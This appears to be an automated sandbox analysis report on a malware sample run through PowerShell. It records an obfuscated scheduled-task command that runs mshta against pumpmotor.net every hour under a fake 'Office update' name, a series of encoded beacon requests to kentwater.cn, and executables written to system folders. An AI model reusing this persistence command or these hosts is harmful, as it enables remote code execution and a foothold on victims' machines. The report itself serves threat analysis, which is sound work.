$OURFvRexTaeE23zV;}}HpWPuNxj;
cmdline	"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 60 /tn Office\option\update /tr "mshta http://pumpmotor.net/editor/smartoption.php" /f

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (9 events)

Time & API	Arguments	Status	Return
send June 13, 2023, 9:53 a.m.	buffer: GET /caches/caches_template/user/index.php?z1sUfI=gi8u3&7Aq42=Gub3nUqdgYFKP8Bf&Xi7cSqs=MwwSVlM2HgkKOCgvdlwrFCIWFloBO0wWAjojIiZdZA8jSDR2OAEnIC4gCh0SfA&o43vz0Wd=DUdJK95 HTTP/1.1 Host: kentwater.cn Connection: Keep-Alive socket: 1272 sent: 223	1	223
send June 13, 2023, 9:53 a.m.	buffer: GET /caches/caches_template/user/index.php?SN6vlWX5=0szj7BZlSTNRF&l9L7t85E1=P9KV5iWFmfb&9il5=AQ3BbrwCUXu1&kzwDru=rp3yzGvbSNwQ&u8dw2=8uLpU5jDOHdsrPly&D4yaJKE=TAw8FWhWBSkiKQoXVDQFC10WOBk6W1c2KisBGgQ1ShBcSBo1A2E8AAYxKCUwFA&vRdFJALhu=bLMoFCsqn HTTP/1.1 Host: kentwater.cn socket: 1272 sent: 272	1	272
send June 13, 2023, 9:53 a.m.	buffer: GET /caches/caches_template/user/index.php?TlMcD0Ao=25IilUCF6y&TU1JA34g=Tyzc7puEYRS1O3Q&hregZ=UO7DwbvfTCphWZzq&Pcm50x6=ITZHIUoBGQs5Ih4McT4TAzAsQy0YDEsUMSAVASE_XBgxcmEBITYgIh06PD4VHg&IHGKOC=4UESkm HTTP/1.1 Host: kentwater.cn socket: 1272 sent: 228	1	228
send June 13, 2023, 9:54 a.m.	buffer: GET /caches/caches_template/user/index.php?lIc=1FOdISaB&9P71m=NqDdzlOor3fSQpIG&qPv7KDa=Ogg0AUcPIAIfUgg3dxQgNSsSMA0VAnIdF1ADOicVby4qTBIhLDgZKztKKgUTNA HTTP/1.1 Host: kentwater.cn socket: 1272 sent: 182	1	182
send June 13, 2023, 9:54 a.m.	buffer: GET /caches/caches_template/user/index.php?6v=GUrbi7L&vtfW8=sYghU7IQo21ftAXj&9eDt13B=ByAXDWhUJjwCU18CUiUxGBY6EwE6WXQjClFUDwIkfgMXZDEtA2MfFSZLfTA2BQ&Mz4s=UO2J0&g4VEDh=HjdIpfc HTTP/1.1 Host: kentwater.cn socket: 1272 sent: 206	1	206
send June 13, 2023, 9:54 a.m.	buffer: GET /caches/caches_template/user/index.php?VXRu=6kLbuY1aWeJmjO&LVfau=lH0D8E1OxtUGIkJR&RA6dcsU=GDFAIQUmXiIVFTsjbw8jIAkrRC1XKww9HRcwLj8ObDsIdWYBbhFnCzENGRELLw HTTP/1.1 Host: kentwater.cn socket: 1272 sent: 189	1	189
send June 13, 2023, 9:54 a.m.	buffer: GET /caches/caches_template/user/index.php?MXsl7LC8D=N7X1SoIhvZV&uFzOMrnj=M8FeRUNq1nP&qUMSj=7FeDtQP8Hk1csmZI&74bdWNa=Qz8VIUkyP1UlCl8HVQkzO1IlES0bP21KLQhUCgUIfCBTezMBIgUGfAESfTUxKQ&XKAn=WEen6 HTTP/1.1 Host: kentwater.cn socket: 1272 sent: 223	1	223
send June 13, 2023, 9:55 a.m.	buffer: GET /caches/caches_template/user/index.php?CAVOt6Npb=xjPDl6R&ydEJCl=MAErLBSCmOJG&4iGjK=4lSxO0qiNcfvm1H7&21Jn0lD=QBUjHXJTHgQjAggSS1UhRVEPJxEgXkwbKwADHxtUbl5QUQU9GWQnLQcaKiAvdQ&E9vtGu=ugi HTTP/1.1 Host: kentwater.cn socket: 1272 sent: 218	1	218
send June 13, 2023, 9:55 a.m.	buffer: GET /caches/caches_template/user/index.php?DNhmTrg6B=RLgh7dp3c2rTt&h=wap8I5&inu2wpr5G=bKXDenjoQ&2JptK=y7gAKRvqBtib8mpu&F9umKUj=DU4XJHYxGRwvFQcGHgkZBxxUEygkPEsDJxcMC04IVhwdCjEEHQYgNQsNJTR6KQ&7=ugwN HTTP/1.1 Host: kentwater.cn socket: 1272 sent: 229	1	229

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 60 /tn Office\option\update /tr "mshta http://pumpmotor.net/editor/smartoption.php" /f

The process powershell.exe wrote an executable file to disk (21 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Windows\System32\schtasks.exe

smartoption.php.html

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All